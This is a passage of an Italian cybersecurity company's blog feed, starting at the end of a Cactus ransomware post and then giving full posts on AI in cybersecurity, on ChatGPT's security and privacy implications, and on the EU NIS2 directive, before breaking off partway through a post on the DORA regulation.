&lt;p&gt;Il consiglio principale è quello di &lt;strong&gt;aggiornare tutti i servizi VPN&lt;/strong&gt; e di &lt;strong&gt;implementare servizi per la gestione delle password&lt;/strong&gt;.  Grazie a questi due consigli sarà possibile ridurre l’esposizione alle minacce del malware Cactus.
Un altro consiglio, sempre utile, è &lt;strong&gt;implementare l’autenticazione a più fattori&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;cosa-aspettarsi-nel-prossimo-futuro&#34;&gt;Cosa aspettarsi nel prossimo futuro&lt;/h2&gt;

&lt;p&gt;Il mondo del cybercrimine è sempre un passo avanti, purtroppo.
In futuro ci si dovrà aspettare che i &lt;strong&gt;nuovi ransomware&lt;/strong&gt; siano sempre &lt;strong&gt;più sofisticati e difficili da riconoscere&lt;/strong&gt;, per questo, avere un team dedicato che sia sempre aggiornato sui temi cybersecurity diventerà una necessità per ogni realtà aziendale. &lt;strong&gt;Affidarsi ad un SOC&lt;/strong&gt; permette un monitoraggio continuo della propria infrastruttura per verificare eventuali anomalie, in &lt;sup&gt;24&lt;/sup&gt;&amp;frasl;&lt;sub&gt;7&lt;/sub&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>L&#39;intelligenza artificiale nella cybersecurity</title>
         <link>https://blog.cybergon.com/posts/intelligenza-artificiale-e-cybersecurity/</link>
         <pubDate>Thu, 15 Jun 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/intelligenza-artificiale-e-cybersecurity/</guid>
         <description>

&lt;p&gt;A seguito dell’articolo di qualche settimana fa che trattava i rischi che possono nascere dall’utilizzo di &lt;a href=&#34;https://blog.cybergon.com/posts/implicazioni-chatgpt-sicurezza-informatica/&#34;&gt;ChatGPT&lt;/a&gt;, nei prossimi paragrafi si indaga &lt;strong&gt;il ruolo che l’intelligenza artificiale&lt;/strong&gt; (in inglese Artificial Intelligence o AI) &lt;strong&gt;ricopre nel mondo della cybersecurity&lt;/strong&gt;, analizzando i vantaggi e i rischi.&lt;/p&gt;

&lt;p&gt;L’intelligenza artificiale è entrata nella vita di tutti i giorni ed è ormai utilizzata da gran parte delle aziende per poter semplificare processi aziendali, automatizzare parti ripetitive, ridurre gli errori e permettere la creazione e lo sviluppo di nuovi prodotti.&lt;/p&gt;

&lt;p&gt;È plausibile presupporre che le aziende in grado di servirsi di queste tecnologie saranno le prime a poter beneficiare di un enorme vantaggio competitivo nel medio termine.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/ai/ai-copertina.png&#34; alt=&#34;AI e Cyber&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;cos-è-l-intelligenza-artificiale&#34;&gt;Cos’è l’intelligenza artificiale&lt;/h2&gt;

&lt;p&gt;Secondo il Politecnico di Milano, l’intelligenza artificiale è “il ramo della computer science che studia lo sviluppo di sistemi hardware e software dotati di capacità tipiche dell’essere umano ed in grado di perseguire autonomamente una finalità definita prendendo delle decisioni che, fino a quel momento erano solitamente affidate agli uomini”.&lt;/p&gt;

&lt;p&gt;Il termine AI inizia a diventare di uso comune grazie a John McCarthy che nel 1956 lo coniò durante la famosa conferenza di Dartmouth. Iniziò a teorizzare come un computer potesse essere in grado di comportarsi come un essere umano, simulando gli aspetti di apprendimento.&lt;/p&gt;

&lt;p&gt;Un &lt;strong&gt;sistema di AI&lt;/strong&gt; non si basa sulla programmazione, bensì su &lt;strong&gt;tecniche di apprendimento&lt;/strong&gt;: vengono definiti degli algoritmi che elaborano un’enorme quantità di dati, dai quali è il sistema stesso a derivare le proprie capacità di ragionamento e di comprensione all’interno di un ambiente di calcolo dinamico.&lt;/p&gt;

&lt;p&gt;Le componenti chiave quando si parla di AI sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sistemi di calcolo&lt;/li&gt;
&lt;li&gt;Dati e sistemi per la gestione&lt;/li&gt;
&lt;li&gt;Algoritmi di AI avanzati&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;utilizzo-dell-intelligenza-artificiale-in-italia&#34;&gt;Utilizzo dell’intelligenza artificiale in Italia&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;In Italia&lt;/strong&gt;, secondo uno studio dell’Osservatorio Artificial Intelligence del Politecnico di Milano, il mercato delle soluzioni e dei servizi nel 2022 ha raggiunto il valore di 500 milioni di euro, facendo registrare una &lt;strong&gt;crescita del 32%&lt;/strong&gt; in un anno.&lt;/p&gt;

&lt;p&gt;6 aziende su 10 hanno avviato almeno un progetto basato su questa tecnologia; il 73% delle iniziative è stato avviato direttamente da realtà italiane, mentre il 27% fa riferimento a progetti internazionali.
Se si considerano solo le PMI, invece, queste percentuali diminuiscono drasticamente: solo il 15% ha un progetto AI avviato.&lt;/p&gt;

&lt;h2 id=&#34;ruolo-dell-ai-nella-cybersecurity&#34;&gt;Ruolo dell’AI nella cybersecurity&lt;/h2&gt;

&lt;p&gt;Gli attacchi informatici crescono di volume e complessità; in questo contesto, l’intelligenza artificiale aiuta a &lt;strong&gt;rendere più accurata la threat intelligence&lt;/strong&gt; mediante l’analisi di documenti e informazioni utili e flussi di lavoro più snelli ed autonomi.
In particolare, permette di rilevare anomalie ed attività con tempistiche ridotte, monitora intrusioni non autorizzate, automatizza processi di gestione della sicurezza, protegge i dati sensibili all’interno dell’infrastruttura aziendale, assegna priorità ai livelli di rischio e permette di ridurre i tempi di risposta agli incidenti.&lt;/p&gt;

&lt;p&gt;Non bisogna però scordarsi che l’&lt;strong&gt;intelligenza artificiale è impiegata anche dai cyber criminali&lt;/strong&gt; per mettere in piedi attacchi informatici ad hoc.&lt;/p&gt;

&lt;p&gt;L’AI può essere utilizzata, infatti, per creare codice malevolo, per individuare e sfruttare vulnerabilità e per mettere in piedi campagne phishing sempre più sofisticate.&lt;/p&gt;

&lt;p&gt;La creazione di testo, grazie all’AI, ha reso le campagne phishing difficili da riconoscere tanto da spingere alcuni ricercatori a fare un esperimento su questo tema per capire la facilità di riconoscimento da parte degli utenti di e-mail generate da AI, rispetto ad e-mail scritte dall’essere umano.
Alla fine dell’esperimento è stato osservato come la maggior parte dei riceventi avesse cliccato sulla mail generata dall’AI, inserendo codici e credenziali, poiché convinti che il messaggio fosse attendibile.
I risultati, seppur su un campione ridotto e target omogeneo, hanno sottolineato come l’AI potrebbe giocare un ruolo chiave nelle campagne phishing, aumentando i rischi per gli utenti di caderne vittime.&lt;/p&gt;

&lt;h2 id=&#34;i-rischi-e-i-vantaggi-cyber&#34;&gt;I rischi e i vantaggi cyber&lt;/h2&gt;

&lt;p&gt;Come già anticipato nell’articolo su ChatGPT, ci sono &lt;strong&gt;diversi rischi&lt;/strong&gt; quando si parla di AI, per questo è importante conoscerli per prevenirli.&lt;/p&gt;

&lt;p&gt;Esistono &lt;strong&gt;diverse tecniche di attacco&lt;/strong&gt; baste sull’AI: una delle più pericolose riguarda la realizzazione di codice dannoso per la creazione di minacce Zero-day, ovvero quelle minacce mai viste per cui non è disponibile nessuna patch, cioè nessuna protezione.
Un ulteriore rischio riguarda la possibilità che i cyber criminali possano manipolare i sistemi di AI per eludere le misure di sicurezza. È necessario monitorare e valutare costantemente l’efficacia di queste soluzioni ed essere sempre aggiornati sugli sviluppi in campo cyber security.&lt;/p&gt;

&lt;p&gt;Se da un lato vi sono dei rischi, esistono anche dei &lt;strong&gt;vantaggi&lt;/strong&gt;. L’&lt;strong&gt;AI&lt;/strong&gt; può essere una grande &lt;strong&gt;alleata della cybersecurity&lt;/strong&gt; per la prevenzione degli attacchi, soprattutto se utilizzata nei processi di monitoraggio e nelle procedure di analisi.
Grazie all’intelligenza artificiale è possibile scovare anomalie, identificare attacchi in corso e aumentare la protezione in maniera proattiva. Come? Potendo analizzare l’intero ecosistema aziendale, si avrà una visione completa delle interazioni che avvengo all’interno dello stesso, anticipando il rilevamento delle minacce.&lt;/p&gt;

&lt;p&gt;La superficie di attacco nei moderni ambienti aziendali è sempre in aumento, così come i volumi di dati che devono essere monitorati ed analizzati per individuare potenziali rischi. È necessario un nuovo livello di soluzioni per contrastare le minacce informatiche: l’&lt;strong&gt;AI è lo strumento&lt;/strong&gt; che, se &lt;strong&gt;combinato con l’esperienza umana&lt;/strong&gt; ed altre tecnologie di sicurezza, può fornire la massima protezione. L’importanza di affidarsi ad un Security Operation Center riguarda proprio l’erogazione di un servizio che permette, una volta rilevata un’anomalia, di verificare il grado della minaccia e di mettere in campo le misure di response necessarie. In altre parole, per valutazione delle conseguenze e per valutare l’impatto sociale ed economico, deve entrare in gioco l’intelligenza umana.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Le implicazioni dell&#39;uso di ChatGPT nella sicurezza informatica</title>
         <link>https://blog.cybergon.com/posts/implicazioni-chatgpt-sicurezza-informatica/</link>
         <pubDate>Wed, 17 May 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Francesca Cioffi</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/implicazioni-chatgpt-sicurezza-informatica/</guid>
         <description>

&lt;p&gt;Negli ultimi mesi l’intelligenza artificiale è tornata al centro dell’attenzione soprattutto a partire da novembre 2022, quando sul mercato è arrivato ChatGPT, uno strumento di elaborazione del linguaggio naturale basato sull’intelligenza artificiale.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/chatgpt/chatgpt-copertina.png&#34; alt=&#34;ChatGPT&#34; /&gt;&lt;/p&gt;

&lt;p&gt;ChatGPT è un modello di intelligenza artificiale basato sull’architettura GPT-3.5, il terzo modello di Generative Pretrained Transformer sviluppato da OpenAI. Quello utilizzato, fa parte di un gruppo di modelli di intelligenza artificiale tecnicamente chiamati &lt;strong&gt;LLM&lt;/strong&gt; (Large Language Model) e basati sul &lt;strong&gt;machine learning&lt;/strong&gt;. Funzionano utilizzando una tecnica di &lt;strong&gt;deep learning&lt;/strong&gt; nota come &lt;strong&gt;transformer&lt;/strong&gt;, che consiste nell’utilizzare una &lt;strong&gt;rete neurale&lt;/strong&gt; per analizzare e comprendere il significato di un testo.&lt;/p&gt;

&lt;p&gt;ChatGPT è dunque uno strumento di &lt;strong&gt;elaborazione del linguaggio naturale (o Natural Language Processing)&lt;/strong&gt; che utilizza algoritmi avanzati di apprendimento automatico per generare risposte simili a quelle umane all’interno di un discorso.&lt;/p&gt;

&lt;p&gt;Grazie alla sua facile usabilità e alla capacità di fornire risposte immediate a un’ampia gamma di domande, di elaborare testi complessi e di risolvere problemi, ChatGPT si è diffuso rapidamente tra gli utenti di tutto il mondo.
Tuttavia, ha un grande limite: il database delle informazioni è fermo all’anno 2021 e, dunque, non è in grado di fornire risposte aggiornate.&lt;/p&gt;

&lt;h2 id=&#34;chatgpt-e-regolamentazione&#34;&gt;ChatGPT e regolamentazione&lt;/h2&gt;

&lt;p&gt;Nel contesto italiano si è verificato il primo caso di regolamentazione del software di intelligenza artificiale relazionale tramite uno stop del Garante Per la Protezione dei Dati Personali il 31 marzo 2023. Il Garante della Privacy ha imposto una limitazione provvisoria del trattamento dei dati degli utenti italiani nei confronti di OpenAI, la società statunitense che ha creato e gestisce la piattaforma, in seguito a un data breach accaduto il 20 marzo 2023, in cui risultavano visibili le conversazioni dei singoli utenti e le informazioni relative al pagamento degli abbonati al servizio.&lt;/p&gt;

&lt;p&gt;I punti contestati dall’Autorità amministrativa italiana sono diversi, a partire dalla mancanza di un’informativa esplicita agli utenti i cui dati vengono raccolti da OpenAI, all’assenza di una base giuridica che giustifichi la raccolta e la conservazione massiccia di dati personali, fino ad arrivare alla mancata verifica dell’età degli utenti, dando quindi il via libera indiscriminato all’uso della piattaforma da parte di minorenni esposti al rischio di risposte inadeguate.&lt;/p&gt;

&lt;p&gt;Dopo qualche settimana, il 13 aprile 2023, durante la riunione dell’&lt;strong&gt;European Data Protection Board&lt;/strong&gt; (EDPB), le Autorità garanti della UE hanno deciso di istituire una task force “per promuovere la cooperazione e lo scambio di informazioni su eventuali azioni di applicazione condotte alle Autorità di protezione dei dati” e avere un’uniformità di approccio e di interpretazione tra le varie autorità.&lt;/p&gt;

&lt;p&gt;Per quanto riguarda l’Italia, l’uso di ChatGPT è stato ripristinato ed entro il 15 maggio 2023 Open AI dovrà promuovere una campagna di informazione su emittenti radiofoniche, televisive, stampa e web per rendere note le modalità di utilizzo dei dati personali ai fini dell’addestramento degli algoritmi.&lt;/p&gt;

&lt;h2 id=&#34;quanto-costa-chatgpt&#34;&gt;Quanto costa ChatGPT?&lt;/h2&gt;

&lt;p&gt;Secondo quanto riportato da The Information, tenere attivo ChatGPT ha un costo superiore ai 700.000 dollari al giorno per OpenAI, costo dovuto prevalentemente al mantenimento dei server. In effetti, nel 2022 l’azienda ha segnato un passivo di 540 milioni di dollari, la cui maggior parte è stata causata proprio dalla programmazione e dalla gestione del tool.&lt;/p&gt;

&lt;p&gt;A febbraio di quest’anno, OpenAI ha lanciato il servizio a pagamento &lt;strong&gt;ChatGPT Plus&lt;/strong&gt; al costo di 20 dollari al mese. Il servizio permette di ottenere tempi di risposta più rapidi e avere accesso prioritario alle nuove funzionalità, oltre a rimpinguare le casse dell’azienda. La situazione economica potrebbe comunque peggiorare per l’aumento esponenziale del fruitore della piattaforma e la conseguente necessità di migliorare e velocizzare gli algoritmi. Ad ogni modo, l’azienda non corre rischi di fallimento in quanto la multinazionale Microsoft ha investito oltre 10 miliardi di dollari assicurandosi l’opportunità di utilizzare i modelli di OpenAI nei suoi prodotti.&lt;/p&gt;

&lt;h2 id=&#34;gli-effetti-dell-uso-di-chatgpt-in-ambito-di-sicurezza-informatica&#34;&gt;Gli effetti dell&amp;rsquo;uso di ChatGPT in ambito di sicurezza informatica&lt;/h2&gt;

&lt;p&gt;ChatGPT, come tutti i tipi di tecnologie, può essere utilizzato per semplificare la vita degli uomini, ma anche per renderla più complicata.&lt;/p&gt;

&lt;p&gt;Da un lato, ChatGPT può essere interpellato per ottenere codice dannoso, per individuare una vulnerabilità scoperta recentemente e dunque per rendere ancora più semplice e automatizzato il processo di attacco a un’infrastruttura. Inoltre, può essere sfruttato per migliorare le tecniche di ingegneria sociale e rendere gli attacchi di phishing più mirati, sofisticati e realistici. Ancora, il software di intelligenza artificiale può essere utilizzato per campagne DeepFake: infatti, partendo dalla sua funzione principale, ovvero quella di chatbot, aggiungendo un’interfaccia testuale avanzata e la registrazione di immagini, video e audio, la tecnologia può creare un output video che rappresenta la persona mentre recita frasi che non ha mai realmente detto. In questo caso, i DeepFake possono essere impiegati in campagne diffamatorie, frodi, furti e personificazioni del tutto illegali.&lt;/p&gt;

&lt;p&gt;Dall’altro lato, ChatGPT può essere adoperato per far progredire la sicurezza informatica. Ad esempio, i vendor possono individuare e risolvere le vulnerabilità più velocemente, in modo da rendere più sicuro l’utilizzo dei software ed evitare di lasciare porte aperte a potenziali attaccanti. Inoltre, ChatGPT può essere integrato nella formazione anti-phishing di un’azienda per aumentare la consapevolezza dei dipendenti.&lt;/p&gt;

&lt;p&gt;In conclusione, consigliamo di utilizzare ChatGPT in modo consapevole, evitando di condividere informazioni sensibili riguardanti il proprio lavoro. &lt;strong&gt;Amazon&lt;/strong&gt; e &lt;strong&gt;Microsoft&lt;/strong&gt; hanno richiesto ai propri dipendenti di non trasferire informazioni riservate o pezzi di codice, aggiungendo che in caso di fuga di informazioni riservate sarebbe difficile individuare il colpevole. Una fuga di notizie, infatti, si è verificata di recente per il colosso sudcoreano &lt;strong&gt;Samsung&lt;/strong&gt;, dove alcuni dipendenti hanno utilizzato ChatGPT per correggere codice sorgente e per ottimizzare codice che identificava chip difettosi. Come si evince, si tratta di dati particolarmente confidenziali che sono stati raccolti da OpenAI.&lt;/p&gt;

&lt;p&gt;Ricordiamo che ChatGPT è un software che raccoglie tutti i dati condivisi e li utilizza per alimentare il suo dataset.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Direttiva NIS2: nuove misure per la cybersecurity</title>
         <link>https://blog.cybergon.com/posts/direttiva-nis2/</link>
         <pubDate>Thu, 20 Apr 2023 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/direttiva-nis2/</guid>
         <description>

&lt;p&gt;La &lt;strong&gt;Direttiva NIS2&lt;/strong&gt;, entrata in vigore il 17 gennaio 2023, ha l’obiettivo di &lt;strong&gt;disciplinare le misure di gestione del rischio di sicurezza informatica e gli obblighi di segnalazione&lt;/strong&gt; nei settori destinatari della direttiva.
Insieme al Digital Operational Resilience Act (&lt;a href=&#34;https://blog.cybergon.com/posts/regolamento-dora/&#34;&gt;Regolamento DORA&lt;/a&gt;), mira a &lt;strong&gt;creare un nuovo framework europeo&lt;/strong&gt; attraverso due principali obiettivi: aumentare il livello di resilienza informatica degli attori, sia pubblici che privati, e migliorare il livello di consapevolezza delle minacce informatiche al fine di sviluppare una maggiore capacità di prevenzione, gestione e risposta.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/direttiva-nis2/nis2-copertina.png&#34; alt=&#34;direttiva-nis2&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;nis1&#34;&gt;NIS1&lt;/h2&gt;

&lt;p&gt;La Direttiva NIS2 prende forma dalla &lt;strong&gt;Direttiva NIS&lt;/strong&gt; (Direttiva UE &lt;sup&gt;2016&lt;/sup&gt;&amp;frasl;&lt;sub&gt;1148&lt;/sub&gt;), pubblicata nella Gazzetta ufficiale dell’Unione Europea nel 2016, e può essere considerata il &lt;strong&gt;primo atto della strategia legislativa europea in materia di cybersecurity&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;La Direttiva NIS aveva fissato specifici obiettivi che avrebbero dovuto tradursi nell’adozione coordinata di misure tecniche ed organizzative da parte degli Stati membri, per il rafforzamento dei livelli di sicurezza e il miglioramento della gestione degli incidenti cyber.&lt;/p&gt;

&lt;p&gt;Questi piani hanno mostrato nel corso del tempo &lt;strong&gt;alcuni limiti dovuti principalmente alla rapida digitalizzazione dei processi&lt;/strong&gt; da parte delle società, anche in seguito alla crisi pandemica, e alla conseguente crescita degli attacchi cibernetici.&lt;/p&gt;

&lt;p&gt;Nonostante il valore della Direttiva NIS, è nata la necessità di &lt;strong&gt;innalzare il livello di sensibilità sul tema della cybersecurity&lt;/strong&gt;, estendendo il campo di applicazione anche a nuovi settori.&lt;/p&gt;

&lt;p&gt;Diversi di questi, inizialmente esclusi, sono divenuti con il tempo “essenziali” e, non essendosi adeguati nel corso degli anni, si sono dimostrati più impreparati nella gestione delle minacce cibernetiche.
Per questo motivo, l’&lt;strong&gt;Unione Europea ha ravvisato la necessità di integrare la Direttiva&lt;/strong&gt; attraverso la nascita dell’odierna Direttiva NIS2.&lt;/p&gt;

&lt;h2 id=&#34;i-soggetti-interessati&#34;&gt;I soggetti interessati&lt;/h2&gt;

&lt;p&gt;La &lt;strong&gt;Direttiva NIS si rivolge&lt;/strong&gt; agli operatori che svolgono le proprie attività nei &lt;strong&gt;sette settori considerati essenziali&lt;/strong&gt;, ovvero energia, trasporti, banche, infrastruttura dei mercati finanziari, acqua potabile, sanità e infrastrutture digitali.&lt;/p&gt;

&lt;p&gt;Il legislatore, con la &lt;strong&gt;Direttiva NIS2&lt;/strong&gt;, ha incluso &lt;strong&gt;altri attori attivi in settori sia “ad alta criticità”&lt;/strong&gt;, ovvero quelli delle acque reflue, della gestione dei servizi ICT, della pubblica amministrazione e dello spazio, &lt;strong&gt;sia circoscrivibili ad “altri settori critici”&lt;/strong&gt;, come i servizi postali e di corriere, la gestione dei rifiuti e le organizzazioni di ricerca.&lt;/p&gt;

&lt;p&gt;Nella Direttiva NIS2 viene sancito che gli Stati membri provvedano affinché &lt;strong&gt;i soggetti adottino le misure tecniche, operative ed organizzative adeguate a gestire i rischi oltre che a prevenire o ridurre al minimo l’impatto degli incidenti&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Nella valutazione dell’adeguatezza delle misure individuate occorre tenere in considerazione:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;L’esposizione del soggetto ai rischi&lt;/li&gt;
&lt;li&gt;La grandezza del soggetto&lt;/li&gt;
&lt;li&gt;La probabilità che si verifichino incidenti e la loro gravità&lt;/li&gt;
&lt;li&gt;L’impatto sociale ed economico dell’incidente&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;le-novità&#34;&gt;Le novità&lt;/h2&gt;

&lt;p&gt;Le &lt;strong&gt;novità&lt;/strong&gt; in termini di attività di valutazione dei rischi riguardano una serie di &lt;strong&gt;misure tecniche ed organizzative&lt;/strong&gt; come:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;politiche relative all’analisi dei rischi e di sicurezza dei sistemi informatici;&lt;/li&gt;
&lt;li&gt;gestione degli incidenti;&lt;/li&gt;
&lt;li&gt;gestione della continuità operativa, come la gestione del backup e il ripristino in caso di disastro, e la gestione delle crisi;&lt;/li&gt;
&lt;li&gt;sicurezza della catena di approvvigionamento, ivi compresi gli aspetti relativi alla sicurezza riguardanti i rapporti tra ciascun soggetto e i suoi diretti fornitori o fornitori di servizi;&lt;/li&gt;
&lt;li&gt;sicurezza dell’acquisizione, dello sviluppo e della manutenzione dei sistemi informatici e di rete, compresa la gestione e la divulgazione delle vulnerabilità;&lt;/li&gt;
&lt;li&gt;strategie e procedure per valutare l’efficacia delle misure di gestione dei rischi legati alla cybersecurity;&lt;/li&gt;
&lt;li&gt;pratiche di igiene informatica di base e di formazione in materia di cybersecurity;&lt;/li&gt;
&lt;li&gt;politiche e le procedure relative all’uso della crittografia e della cifratura;&lt;/li&gt;
&lt;li&gt;sicurezza delle risorse umane, strategie di controllo dell’accesso e gestione delle utenze attive;&lt;/li&gt;
&lt;li&gt;uso di soluzioni di autenticazione a più fattori (cd. multi factor authentication) o di autenticazione continua, di comunicazioni vocali, video e testuali protette e di sistemi di comunicazione di emergenza protetti.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tali misure devono essere approvate dagli organi direttivi delle imprese coinvolte, i quali sono chiamati a partecipare a sessioni di formazione in materia cybersecurity.&lt;/p&gt;

&lt;p&gt;Inoltre, i soggetti interessati da un &lt;strong&gt;incidente informatico&lt;/strong&gt; devono intraprendere un &lt;strong&gt;iter di notifica alle autorità competenti&lt;/strong&gt; organizzato in diverse fasi:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;un preallarme entro il termine di 24 ore dalla conoscenza dell’incidente;&lt;/li&gt;
&lt;li&gt;una notifica entro il termine di 72 ore dalla conoscenza dell’incidente, che aggiorni – se necessario – le informazioni del preallarme;&lt;/li&gt;
&lt;li&gt;una relazione finale entro un mese dalla trasmissione della notifica, il cui contenuto minimo è dettagliato dal legislatore.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per la valutazione di un incidente significativo e grave, il legislatore ha specificato che si dovrà tener conto se:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;l’incidente ha causato o è in grado di causare una grave perturbazione operativa dei servizi o perdite finanziarie per l’azienda vittima;&lt;/li&gt;
&lt;li&gt;se l’incidente si è ripercosso o è in grado di ripercuotersi su altre persone fisiche o giuridiche, causando perdite materiali o immateriali considerevoli.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;entrata-in-vigore&#34;&gt;Entrata in vigore&lt;/h2&gt;

&lt;p&gt;In un periodo storico come quello attuale, le iniziative europee come la &lt;strong&gt;Direttiva NIS 2 e il regolamento DORA&lt;/strong&gt; mirano a mettere in campo una serie di attività per l’&lt;strong&gt;implementazione della garanzia dei dati&lt;/strong&gt; dei propri clienti e la &lt;strong&gt;sicurezza delle proprie operazioni di business&lt;/strong&gt;. Pertanto, è bene che tutti i soggetti interessati dalla normativa in materia di cybersecurity inizino a predisporre un piano tecnico organizzativo di adeguamento.&lt;/p&gt;

&lt;p&gt;L’abrogazione della Direttiva NIS e il recepimento della nuova direttiva saranno efficaci solo a partire dal 18 ottobre 2024, lasciando così un margine di pianificazione di ben 21 mesi. I soggetti interessati dalla Direttiva NIS 2 dovranno investire fin da subito tempo e risorse per prepararsi al suo recepimento all’interno dei processi aziendali entro la data ultima. Sarà necessario &lt;strong&gt;valutare e, se opportuno, ripensare tutti i principali processi interni di cybersecurity&lt;/strong&gt;, sulla base dei nuovi obiettivi e dei nuovi obblighi di sicurezza.&lt;/p&gt;

&lt;p&gt;Questa direttiva, insieme al regolamento DORA, sono il primo passo di una &lt;strong&gt;nuova visione sul lungo periodo&lt;/strong&gt;. Il mondo della sicurezza informatica è in continuo cambiamento, per questo è fondamentale affidarsi a chi può portare le nuove tecnologie ed i nuovi processi all’interno dell’azienda, &lt;strong&gt;intraprendendo un percorso&lt;/strong&gt; che deve essere visto in un’ottica di &lt;strong&gt;continuità&lt;/strong&gt; e non come un singolo ed isolato intervento.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Regolamento DORA: Nuovi obblighi in tema cybersecurity</title>
         <link>https://blog.cybergon.com/posts/regolamento-dora/</link>
         <pubDate>Thu, 30 Mar 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/regolamento-dora/</guid>
         <description>

&lt;p&gt;Il &lt;strong&gt;Regolamento DORA&lt;/strong&gt; (Digital Operational Resilience Act), relativo alla resilienza operativa digitale per il settore finanziario, è stato &lt;strong&gt;approvato dal Parlamento europeo&lt;/strong&gt; nella seduta del 10 novembre 2022.&lt;/p&gt;

&lt;p&gt;Il Regolamento fa parte di un pacchetto di misure strategiche che mira a &lt;strong&gt;garantire la capacità delle imprese di affrontare gli attacchi informatici&lt;/strong&gt; ed &lt;strong&gt;implementare le misure di governance, cybersecurity, gestione del rischio e segnalazione degli incidenti&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/regolamento-dora/regolamento-dora-copertina.png&#34; alt=&#34;Regolamento Dora&#34; /&gt;&lt;/p&gt;

&lt;p&gt;DORA è entrato in vigore il ventesimo giorno successivo alla pubblicazione nella Gazzetta Ufficiale dell’Unione Europea, cioè il 16 gennaio 2023, e &lt;strong&gt;diventerà vincolante&lt;/strong&gt; dopo 24 mesi dalla data di entrata in vigore, &lt;strong&gt;a partire&lt;/strong&gt;, quindi, &lt;strong&gt;dal 17 gennaio 2025&lt;/strong&gt;. In poche parole, le aziende dovranno attivare un piano di adeguamento da completare entro la fine del 2024.&lt;/p&gt;

&lt;h2 id=&#34;obiettivo-del-regolamento&#34;&gt;Obiettivo del regolamento&lt;/h2&gt;

&lt;p&gt;L’&lt;strong&gt;obiettivo&lt;/strong&gt; del regolamento DORA è quello di &lt;strong&gt;riunire in un unico atto legislativo tutte le diverse norme sui rischi informatici&lt;/strong&gt; e le disposizioni in materia di rischio digitale nel settore finanziario. Il regolamento mira, quindi, a colmare le lacune e porre rimedio alle incoerenze degli atti legislativi precedenti.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;raggiungimento dei temi&lt;/strong&gt; trattati dal regolamento può avvenire &lt;strong&gt;attraverso diverse attività&lt;/strong&gt;, &lt;strong&gt;riassumibili in 5 macro-punti&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Segnalazione di incidenti connessi alle ICT&lt;/li&gt;
&lt;li&gt;Gestione del rischio&lt;/li&gt;
&lt;li&gt;Test di resilienza operativa digitale con il fine di accrescere la consapevolezza&lt;/li&gt;
&lt;li&gt;Rischi relativi a terze parti&lt;/li&gt;
&lt;li&gt;Condivisione delle informazioni&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nei prossimi paragrafi analizzeranno nel dettaglio ciascuno dei punti sopra.&lt;/p&gt;

&lt;h3 id=&#34;segnalazione-di-incidenti-connessi-alle-ict&#34;&gt;Segnalazione di incidenti connessi alle ICT&lt;/h3&gt;

&lt;p&gt;Il primo aspetto riguarda la &lt;strong&gt;segnalazione di incidenti informatici&lt;/strong&gt;. Con l’introduzione del nuovo regolamento le &lt;strong&gt;entità finanziarie&lt;/strong&gt; saranno &lt;strong&gt;obbligate a segnalare&lt;/strong&gt; alle autorità competenti &lt;strong&gt;gli incidenti gravi&lt;/strong&gt; connessi alle ITC, oltre che a &lt;strong&gt;notificare le minacce informatiche&lt;/strong&gt; significative. Sono da considerarsi anche le segnalazioni di gravi incidenti operativi o relativi alla sicurezza dei pagamenti. In quest’ottica, sarà fondamentale la condivisione dei dati e delle informazioni relative alle vulnerabilità e minacce, oltre che l’esecuzione di test di resilienza operativa digitale. Tutte le informazioni relative alle segnalazioni di incidenti sono consultabili, più nel dettaglio, nel primo capitolo del regolamento.&lt;/p&gt;

&lt;h3 id=&#34;gestione-del-rischio&#34;&gt;Gestione del rischio&lt;/h3&gt;

&lt;p&gt;Il secondo capitolo fa invece riferimento alla &lt;strong&gt;gestione del rischio&lt;/strong&gt;. In particolare, è previsto che le aziende dispongano di una &lt;strong&gt;governance interna e di un quadro di controllo che sovraintendono la gestione del rischio&lt;/strong&gt; affinché sia efficace e prudente. Inoltre sono responsabili per la delega delle attività operative di monitoraggio ad un organo di gestione preposto, il quale dovrà agire tramite una serie definita di compiti. Tutto ciò può avvenire tramite l’&lt;strong&gt;utilizzo di strumenti&lt;/strong&gt; e sistemi di ICT resilienti, tali da &lt;strong&gt;ridurre al minimo l’impatto dei relativi rischi&lt;/strong&gt;. Tra i diversi articoli vengono elencate le maggiori attività coinvolte, come l’introduzione di misure di protezione e prevenzione, l’individuazione tempestiva di attività anomale, la messa in atto di politiche di continuità operativa e piani di ripristino in caso di disastro, la predisposizione di 